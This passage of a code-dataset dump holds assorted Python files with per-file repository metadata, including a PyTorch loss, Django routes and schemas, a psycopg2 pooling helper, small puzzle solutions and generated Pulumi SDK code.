            data[:, 2] = elv_file.raw_counts[:-1]
            data[:, 3] = elv_file.gain_corrections[:-1]
            data[:, 4] = elv_file.dark_currents[:-1]
            spectrum_data_set = spectrum_group.create_dataset(HDF5_SPECTRUM, data=data)

            data = np.arange(1, 1023 + 1)
            spectrum_channel_data_set = spectrum_group.create_dataset(HDF5_SPECTRUM_CHANNELS, data=data)
            spectrum_data_set.dims.create_scale(spectrum_channel_data_set, HDF5_SPECTRUM_CHANNEL)
            spectrum_data_set.dims[0].attach_scale(spectrum_channel_data_set)

            data_types = [HDF5_SPECTRUM_ENERGIES_eV, HDF5_SPECTRUM_COUNTS, HDF5_SPECTRUM_RAW_COUNTS,
                          HDF5_SPECTRUM_GAIN_CORRECTIONS, HDF5_SPECTRUM_DARK_CURRENTS]
            max_size = max([len(data_type) for data_type in data_types])
            data = np.array(data_types, dtype="S{}".format(max_size + 1))
            spectrum_types_data_set = spectrum_group.create_dataset(HDF5_SPECTRUM_DATA_TYPES, data=data)
            spectrum_data_set.dims.create_scale(spectrum_types_data_set, HDF5_SPECTRUM_DATA_TYPE)
            spectrum_data_set.dims[1].attach_scale(spectrum_types_data_set)

    def compare_attribute(self, spectrum_group, attribute_name, attribute_value):
        if attribute_name in spectrum_group.attrs:
            if attribute_value != spectrum_group.attrs[attribute_name]:
                logging.error("{} is not the same in .txt and .elv files".format(attribute_name))
        else:
            spectrum_group.attrs[attribute_name] = attribute_value
| 48.913669 | 106 | 0.698779 | 905 | 6,799 | 4.868508 | 0.233149 | 0.138675 | 0.147072 | 0.164775 | 0.302315 | 0.222424 | 0.128688 | 0.053336 | 0.043123 | 0 | 0 | 0.020547 | 0.198264 | 6,799 | 138 | 107 | 49.268116 | 0.787745 | 0.128548 | 0 | 0 | 1 | 0 | 0.012544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035294 | false | 0 | 0.070588 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19e983d6fa6ccacdf56013ebe5512a2bfbc502f4 | 266 | py | Python | MLModule/loss.py | qai222/ATMOxide | 42702c1ce299233569c8a3c0a9712b0e62ef6b16 | [
"MIT"
] | null | null | null | MLModule/loss.py | qai222/ATMOxide | 42702c1ce299233569c8a3c0a9712b0e62ef6b16 | [
"MIT"
] | null | null | null | MLModule/loss.py | qai222/ATMOxide | 42702c1ce299233569c8a3c0a9712b0e62ef6b16 | [
"MIT"
] | null | null | null | import torch
class CELoss(torch.nn.Module):
    def __init__(self):
        super(CELoss, self).__init__()

    def forward(self, y_pred, y_true):
        y_pred = torch.clamp(y_pred, 1e-9, 1 - 1e-9)
        return -(y_true * torch.log(y_pred)).sum(dim=1).mean()
| 22.166667 | 62 | 0.620301 | 43 | 266 | 3.511628 | 0.534884 | 0.13245 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028986 | 0.221805 | 266 | 11 | 63 | 24.181818 | 0.700483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
c203432f8c53e83233d8d52f9f44b299487593fa | 804 | py | Python | ninja_auth/schema.py | mugartec/django-ninja-auth | bf36b4583a37213001131678d5ecda07f92ba2f6 | [
"WTFPL"
] | 9 | 2021-07-21T21:58:08.000Z | 2022-03-11T07:02:26.000Z | ninja_auth/schema.py | mugartec/django-ninja-auth | bf36b4583a37213001131678d5ecda07f92ba2f6 | [
"WTFPL"
] | 1 | 2022-01-05T17:14:26.000Z | 2022-03-11T18:46:17.000Z | ninja_auth/schema.py | mugartec/django-ninja-auth | bf36b4583a37213001131678d5ecda07f92ba2f6 | [
"WTFPL"
] | 4 | 2021-07-30T12:35:36.000Z | 2022-01-26T15:40:34.000Z | from django.contrib.auth import get_user_model
from ninja import Schema
from ninja.orm import create_schema
from typing import Dict, List
UsernameSchemaMixin = create_schema(
get_user_model(),
fields=[get_user_model().USERNAME_FIELD]
)
EmailSchemaMixin = create_schema(
get_user_model(),
fields=[get_user_model().EMAIL_FIELD]
)
UserOut = create_schema(
get_user_model(),
exclude=['password']
)
class LoginIn(UsernameSchemaMixin):
password: str
class RequestPasswordResetIn(EmailSchemaMixin):
pass
class SetPasswordIn(UsernameSchemaMixin):
new_password1: str
new_password2: str
token: str
class ChangePasswordIn(Schema):
old_password: str
new_password1: str
new_password2: str
class ErrorsOut(Schema):
errors: Dict[str, List[str]]
| 17.866667 | 47 | 0.746269 | 95 | 804 | 6.073684 | 0.4 | 0.07279 | 0.124783 | 0.098787 | 0.291161 | 0.249567 | 0.145581 | 0.145581 | 0.145581 | 0 | 0 | 0.005997 | 0.170398 | 804 | 44 | 48 | 18.272727 | 0.85907 | 0 | 0 | 0.233333 | 0 | 0 | 0.00995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.366667 | 0.133333 | 0 | 0.566667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
c21f20598fcb4edb1815430a740e9fd92d38d7c4 | 1,767 | py | Python | sichu/apiserver/urls.py | ax003d/sichu_web | f01002f169fb5a683996bd5987572d55f1fa7c3b | [
"MIT"
] | 55 | 2016-04-05T15:42:21.000Z | 2018-07-19T07:13:09.000Z | sichu/apiserver/urls.py | ax003d/sichu_web | f01002f169fb5a683996bd5987572d55f1fa7c3b | [
"MIT"
] | null | null | null | sichu/apiserver/urls.py | ax003d/sichu_web | f01002f169fb5a683996bd5987572d55f1fa7c3b | [
"MIT"
] | 18 | 2016-04-05T15:40:13.000Z | 2018-03-15T23:50:27.000Z | from django.conf.urls import patterns, include, url
from apiserver.resources import v1_api
urlpatterns = patterns(
'apiserver.views',
(r'^v1/account/register/$', 'account__register'),
(r'^v1/account/login/$', 'account__login'),
(r'^v1/account/login_by_weibo/$', 'account__login_by_weibo'),
(r'^v1/account/unbind_weibo/$', 'account__unbind_weibo'),
(r'^v1/account/bind_weibo/$', 'account__bind_weibo'),
(r'^v1/account/may_know/$', 'account__may_know'),
(r'^v1/account/update_gexinid/$', 'account__update_gexinid'),
(r'^v1/account/numbers/$', 'account__numbers'),
(r'^v1/account/email_verify/$', 'account__email_verify'),
# v1/book/ # Get BookResource
# v1/bookown/ # Get BookOwnershipResource
(r'^v1/bookown/add/$', 'bookown__add'),
(r'^v1/bookown/delete/(?P<bo_id>.*)/$', 'bookown__delete'),
(r'^v1/bookown/export/$', 'bookown__export'),
(r'^v1/bookown/(?P<bo_id>.*)/$', 'bookown__edit'),
# v1/bookborrow/ # Get BookBorrowRecResource
(r'^v1/bookborrow/(?P<rec_id>.*)/$', 'bookborrow__detail'),
# ^v1/bookborrowreq/ # Get BookBorrowReqResource
(r'^v1/bookborrowreq/(?P<req_id>.*)/$', 'bookborrowreq__detail'),
(r'^v1/friends/follow/$', 'friends__follow'),
# v1/follow/ # Get FollowResource
# v1/oplog/ # Get OperationLogResource
(r'^v1/request/bookborrow/$', 'bookborrow__add'),
# ^v1/user/ # Get UserResource
(r'^v1/task/export/$', 'task__export'),
(r'^v1/monitor/push_notification/$', 'monitor__push_notification'),
(r'^v1/monitor/error_report/$', 'monitor__error_report'),
(r'^v1/monitor/test_email/$', 'monitor__test_email'),
(r'^v1/monitor/logging_and_http/$', 'monitor__logging_and_http'),
(r'^', include(v1_api.urls)),
)
| 44.175 | 71 | 0.658744 | 216 | 1,767 | 5.046296 | 0.305556 | 0.06055 | 0.082569 | 0.041284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020248 | 0.13356 | 1,767 | 39 | 72 | 45.307692 | 0.691705 | 0.14601 | 0 | 0 | 0 | 0 | 0.646783 | 0.428284 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c228a9b1d80f8cfbee6a5a60ed922e91b7ade1a6 | 176 | py | Python | noxfile.py | ucodery/slicetime | cc5eb15b9afc5fa701a84ee2049bd582cc82db90 | [
"MIT"
] | 1 | 2022-03-29T06:53:37.000Z | 2022-03-29T06:53:37.000Z | noxfile.py | ucodery/slicetime | cc5eb15b9afc5fa701a84ee2049bd582cc82db90 | [
"MIT"
] | null | null | null | noxfile.py | ucodery/slicetime | cc5eb15b9afc5fa701a84ee2049bd582cc82db90 | [
"MIT"
] | null | null | null | import nox
@nox.session(python=['3.7', '3.8', '3.9', '3.10', 'pypy3.7', 'pypy3.8', 'pypy3.9'])
def unittest(session):
session.install('.[test]')
session.run('pytest')
| 25.142857 | 83 | 0.590909 | 28 | 176 | 3.714286 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097403 | 0.125 | 176 | 6 | 84 | 29.333333 | 0.577922 | 0 | 0 | 0 | 0 | 0 | 0.267045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c23545ce408d38954fc18d89851addac263b547f | 651 | py | Python | darwin/importer/formats/darwin.py | v7labs/darwin-lib | 13efb4867effd3d312bcfafe1ee242aed61fae3a | [
"MIT"
] | 2 | 2019-09-04T13:32:07.000Z | 2019-09-19T10:10:41.000Z | darwin/importer/formats/darwin.py | v7labs/darwin-lib | 13efb4867effd3d312bcfafe1ee242aed61fae3a | [
"MIT"
] | 1 | 2019-09-19T11:17:44.000Z | 2019-09-19T17:34:31.000Z | darwin/importer/formats/darwin.py | v7labs/darwin-cli | 13efb4867effd3d312bcfafe1ee242aed61fae3a | [
"MIT"
] | null | null | null | from pathlib import Path
from typing import Optional
import darwin.datatypes as dt
from darwin.utils import parse_darwin_json
def parse_path(path: Path) -> Optional[dt.AnnotationFile]:
"""
Parses the given file into a darwin ``AnnotationFile`` or returns ``None`` if the file does not
have a ``.json`` extension.
Parameters
----------
path : Path
The ``Path`` of the file to parse.
Returns
-------
Optional[dt.AnnotationFile]
The ``AnnotationFile`` file or ``None`` if the file was not parseable.
"""
if path.suffix != ".json":
return None
return parse_darwin_json(path, 0)
| 25.038462 | 99 | 0.645161 | 85 | 651 | 4.882353 | 0.435294 | 0.057831 | 0.072289 | 0.062651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002016 | 0.238095 | 651 | 25 | 100 | 26.04 | 0.834677 | 0.486943 | 0 | 0 | 0 | 0 | 0.017731 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.5 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
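A dependency-free sketch of the same suffix-guard pattern used by `parse_path` above (the helper name `parse_json_stem` is hypothetical, standing in for `parse_darwin_json`):

```python
from pathlib import Path
from typing import Optional


def parse_json_stem(path: Path) -> Optional[str]:
    # Mirrors parse_path's guard: anything without a .json suffix
    # is declared unparseable by returning None.
    if path.suffix != ".json":
        return None
    return path.stem
```

As with `parse_path`, callers can distinguish "not a JSON file" (`None`) from a parsed result with a simple `is None` check.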
c238cadb5993cdf46dc561a36f19902caaa298f8 | 325 | py | Python | BubbleBobble/BubbleBobble.py | NadanKim/Python | 0b47e0051b70b67fbdbe9188efc631d96ac6686a | [
"MIT"
] | 1 | 2020-05-04T05:54:06.000Z | 2020-05-04T05:54:06.000Z | BubbleBobble/BubbleBobble.py | NadanKim/Python | 0b47e0051b70b67fbdbe9188efc631d96ac6686a | [
"MIT"
] | null | null | null | BubbleBobble/BubbleBobble.py | NadanKim/Python | 0b47e0051b70b67fbdbe9188efc631d96ac6686a | [
"MIT"
] | null | null | null | import platform
import os
if platform.architecture()[0] == '32bit':
os.environ["PYSDL2_DLL_PATH"] = "./SDL2/x86"
else:
os.environ["PYSDL2_DLL_PATH"] = "./SDL2/x64"
import game_framework
from pico2d import *
import start_state
# fill here
open_canvas(1200, 800, True)
game_framework.run(start_state)
close_canvas() | 19.117647 | 48 | 0.735385 | 47 | 325 | 4.87234 | 0.638298 | 0.078603 | 0.131004 | 0.157205 | 0.227074 | 0.227074 | 0 | 0 | 0 | 0 | 0 | 0.067138 | 0.129231 | 325 | 17 | 49 | 19.117647 | 0.742049 | 0.027692 | 0 | 0 | 0 | 0 | 0.174603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.416667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
c2416378b5347dc2b26104a502e6c271d41efa81 | 6,765 | py | Python | Demo/cims_db.py | ComtecSystem-dev/Python_DB_Pool | 332cbe9986569e57809dc2e76fe97f7df77b47d8 | [
"Apache-2.0"
] | null | null | null | Demo/cims_db.py | ComtecSystem-dev/Python_DB_Pool | 332cbe9986569e57809dc2e76fe97f7df77b47d8 | [
"Apache-2.0"
] | null | null | null | Demo/cims_db.py | ComtecSystem-dev/Python_DB_Pool | 332cbe9986569e57809dc2e76fe97f7df77b47d8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
# _____ _ #
# / ____ | | #
# | | ___ _ __ ____| |__ ___ ___ #
# | | / _ \/ '_ ` _ \_ __/ _ \/ __/ #
# | |___| (_) | | | | | | |_| /__/ (_ #
# \_____\___/|_| |_| |_/\___\___|\___\ #
# _____ _ #
# / ____| | | #
# | (___ _ _ ___| |_ ___ _ __ ___ ___ #
# \___ \| | | / __| __/ _ \ '_ ` _ \/ __| #
# ____) | |_| \__ \ || __/ | | | | \__ \ #
# |_____/ \__, |___/\__\___|_| |_| |_|___/ #
# __/ | #
# |___/ #
# #
################################################################################
# #
# Copyright (c) 2018 Comtec Systems #
# All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# License for the specific language governing permissions and limitations #
# under the License. #
# #
################################################################################
import psycopg2
from psycopg2 import pool
class DBManager(object):
def __init__(self):
self.ip = '127.0.0.1'
self.port = '5432'
self.dbname = ''
self.user_id = ''
self.user_pw = ''
self.conn = None
def print_dbinfo(self):
print "[IP=%s][PORT=%s][DB Name=%s][User ID=%s][User PW=%s]" % (self.ip, self.port, self.dbname, self.user_id, self.user_pw)
def Connect(self, ip, port, dbname, user_id, user_pw):
self.ip = ip
self.port = port
self.dbname = dbname
self.user_id = user_id
self.user_pw = user_pw
self.print_dbinfo()
#self.conn = psycopg2.connect("host='%s' port='%s' dbname='%s' user='%s' password='%s'" % (self.ip, self.port, self.dbname, self.user_id, self.user_pw))
        self.conn = psycopg2.pool.ThreadedConnectionPool(
            1, 20,
            user=user_id,
            password=user_pw,
            host=ip,
            port=port,
            database=dbname)
if self.conn is None:
return False
return True
def Get_Conn(self):
if self.conn is None:
return None
return self.conn.getconn()
def Put_Conn(self, conn):
if self.conn is None:
return None
self.conn.putconn(conn)
def Select(self, strQuery):
#print strQuery
# Init
conn = self.Get_Conn()
        if conn is None:
            return None
cursor = conn.cursor()
#cursor = self.conn.cursor()
        # Execute the query
try:
cursor.execute(strQuery)
        except psycopg2.IntegrityError:
conn.rollback()
print "(Select) psycopg2.IntegrityError"
except Exception as e:
conn.rollback()
cursor.close()
print "(Select) Exception : %s" % (e)
        # NOTE: the connection goes back to the pool before the caller has
        # consumed the cursor, so another thread may reuse it concurrently.
        self.Put_Conn(conn)
        return cursor
def Execute(self, strQuery):
return_state = None
#print "(Query Execute) %s " % strQuery
# Init
conn = self.Get_Conn()
        if conn is None:
            return None
cursor = conn.cursor()
#cursor = self.conn.cursor()
        # Execute the query
        try:
            cursor.execute(strQuery)
            conn.commit()
            return_state = True
        except psycopg2.IntegrityError:
conn.rollback()
return_state = False
print "(Execute) psycopg2.IntegrityError"
except Exception as e:
conn.rollback()
return_state = False
print "(Execute) Exception : %s" % (e)
        self.Put_Conn(conn)
cursor.close()
return return_state
def Execute_List(self, list_query):
return_state = True
# Init
conn = self.Get_Conn()
        if conn is None:
            return None
cursor = conn.cursor()
#cursor = self.conn.cursor()
for strQuery in list_query:
#print "(Query Execute) %s " % strQuery
            # Execute the query
            try:
                cursor.execute(strQuery)
            except psycopg2.IntegrityError:
print "(Execute_List) psycopg2.IntegrityError"
                return_state = False
                break
except Exception as e:
print "(Execute_List) Exception : %s" % (e)
                return_state = False
                break
        if return_state is None or return_state is False:
conn.rollback()
else:
conn.commit()
cursor.close()
        self.Put_Conn(conn)
return return_state
dbmanager = DBManager() | 42.018634 | 160 | 0.376201 | 504 | 6,765 | 4.674603 | 0.253968 | 0.040747 | 0.025467 | 0.040747 | 0.406197 | 0.352292 | 0.342954 | 0.269949 | 0.225806 | 0.188879 | 0 | 0.009527 | 0.503474 | 6,765 | 161 | 161 | 42.018634 | 0.691873 | 0.414339 | 0 | 0.505155 | 0 | 0.010309 | 0.066923 | 0.018925 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.020619 | 0.020619 | null | null | 0.092784 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c248808de352dba7cf537239fff1a9413acf6d6b | 963 | py | Python | valid-parenthesis-string.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | valid-parenthesis-string.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | valid-parenthesis-string.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | class Solution:
    def checkValidString(self, s: str) -> bool:
        # Two-pass greedy check: scan left-to-right treating each '*' as a
        # potential '(', then right-to-left treating each '*' as a potential
        # ')'. The string is valid only if both passes succeed.
left_count = 0
star_count = 0
for char in s:
if char == '(':
left_count += 1
elif char == '*':
star_count += 1
else:
if left_count > 0:
left_count -= 1
elif star_count > 0:
star_count -= 1
else:
return False
if left_count == 0:
return True
right_count = 0
star_count = 0
for char in s[::-1]:
if char == ')':
right_count += 1
elif char == '*':
star_count += 1
else:
if right_count > 0:
right_count -= 1
            elif star_count > 0:
star_count -= 1
else:
return False
return True | 26.75 | 47 | 0.369678 | 93 | 963 | 3.645161 | 0.247312 | 0.159292 | 0.117994 | 0.176991 | 0.59587 | 0.59587 | 0.59587 | 0.59587 | 0.59587 | 0.265487 | 0 | 0.04186 | 0.553479 | 963 | 36 | 48 | 26.75 | 0.746512 | 0 | 0 | 0.545455 | 0 | 0 | 0.004149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
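A standalone free-function form of the two-pass check above, with a few spot checks (the name `check_valid_string` is hypothetical; the logic mirrors `Solution.checkValidString`):

```python
def check_valid_string(s: str) -> bool:
    # Pass 1: left to right, each '*' may serve as '('.
    left = star = 0
    for ch in s:
        if ch == '(':
            left += 1
        elif ch == '*':
            star += 1
        elif left > 0:      # ch == ')': prefer a real '('
            left -= 1
        elif star > 0:      # fall back to a wildcard
            star -= 1
        else:
            return False
    if left == 0:           # every '(' matched by a later ')' or '*'
        return True
    # Pass 2: right to left, each '*' may serve as ')'.
    right = star = 0
    for ch in reversed(s):
        if ch == ')':
            right += 1
        elif ch == '*':
            star += 1
        elif right > 0:     # ch == '(': prefer a real ')'
            right -= 1
        elif star > 0:
            star -= 1
        else:
            return False
    return True
```

Pass 1 guarantees every `)` has an earlier opener available; pass 2 guarantees every `(` has a later closer available, which together are sufficient.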
dfa13542a9552093d48e374336dd6982ac97d981 | 208 | py | Python | nicedit/forms.py | jardev/django-nicedit | 56adebb0f0313ebb1b855a832c5f2e5c788cedb2 | [
"MIT"
] | null | null | null | nicedit/forms.py | jardev/django-nicedit | 56adebb0f0313ebb1b855a832c5f2e5c788cedb2 | [
"MIT"
] | null | null | null | nicedit/forms.py | jardev/django-nicedit | 56adebb0f0313ebb1b855a832c5f2e5c788cedb2 | [
"MIT"
] | 2 | 2019-06-07T10:37:06.000Z | 2021-11-26T14:45:42.000Z | from django import forms
from .models import NicEditImage
__all__ = ('NicEditImageForm',)
class NicEditImageForm(forms.ModelForm):
class Meta:
model = NicEditImage
fields = '__all__' | 16 | 40 | 0.701923 | 20 | 208 | 6.9 | 0.65 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221154 | 208 | 13 | 41 | 16 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0.110048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
dfc27fbfd9eab2bd3bd88883c044f6ab22a63657 | 402 | py | Python | Python/List_1/rotate_left3.py | RCoon/CodingBat | c5004c03e668c62751dc7f13154c79e25ea34339 | [
"MIT"
] | 1 | 2015-11-06T02:26:50.000Z | 2015-11-06T02:26:50.000Z | Python/List_1/rotate_left3.py | RCoon/CodingBat | c5004c03e668c62751dc7f13154c79e25ea34339 | [
"MIT"
] | null | null | null | Python/List_1/rotate_left3.py | RCoon/CodingBat | c5004c03e668c62751dc7f13154c79e25ea34339 | [
"MIT"
] | null | null | null | # Given an array of ints length 3, return an array with the elements "rotated
# left" so {1, 2, 3} yields {2, 3, 1}.
# rotate_left3([1, 2, 3]) --> [2, 3, 1]
# rotate_left3([5, 11, 9]) --> [11, 9, 5]
# rotate_left3([7, 0, 0]) --> [0, 0, 7]
def rotate_left3(nums):
nums.append(nums.pop(0))
return nums
print(rotate_left3([1, 2, 3]))
print(rotate_left3([5, 11, 9]))
print(rotate_left3([7, 0, 0]))
| 26.8 | 77 | 0.60199 | 76 | 402 | 3.092105 | 0.381579 | 0.32766 | 0.038298 | 0.076596 | 0.391489 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135952 | 0.176617 | 402 | 14 | 78 | 28.714286 | 0.574018 | 0.569652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.5 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
dfd16e7f7186f4d548a8b339ad96b392fe186ea1 | 20,857 | py | Python | sdk/python/pulumi_azure_native/customerinsights/v20170101/link.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/customerinsights/v20170101/link.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/customerinsights/v20170101/link.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['LinkArgs', 'Link']
@pulumi.input_type
class LinkArgs:
def __init__(__self__, *,
hub_name: pulumi.Input[str],
participant_property_references: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]],
resource_group_name: pulumi.Input[str],
source_interaction_type: pulumi.Input[str],
target_profile_type: pulumi.Input[str],
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
reference_only: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a Link resource.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
pulumi.set(__self__, "hub_name", hub_name)
pulumi.set(__self__, "participant_property_references", participant_property_references)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "source_interaction_type", source_interaction_type)
pulumi.set(__self__, "target_profile_type", target_profile_type)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if link_name is not None:
pulumi.set(__self__, "link_name", link_name)
if mappings is not None:
pulumi.set(__self__, "mappings", mappings)
if operation_type is not None:
pulumi.set(__self__, "operation_type", operation_type)
if reference_only is not None:
pulumi.set(__self__, "reference_only", reference_only)
@property
@pulumi.getter(name="hubName")
def hub_name(self) -> pulumi.Input[str]:
"""
The name of the hub.
"""
return pulumi.get(self, "hub_name")
@hub_name.setter
def hub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "hub_name", value)
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@participant_property_references.setter
def participant_property_references(self, value: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]):
pulumi.set(self, "participant_property_references", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="sourceInteractionType")
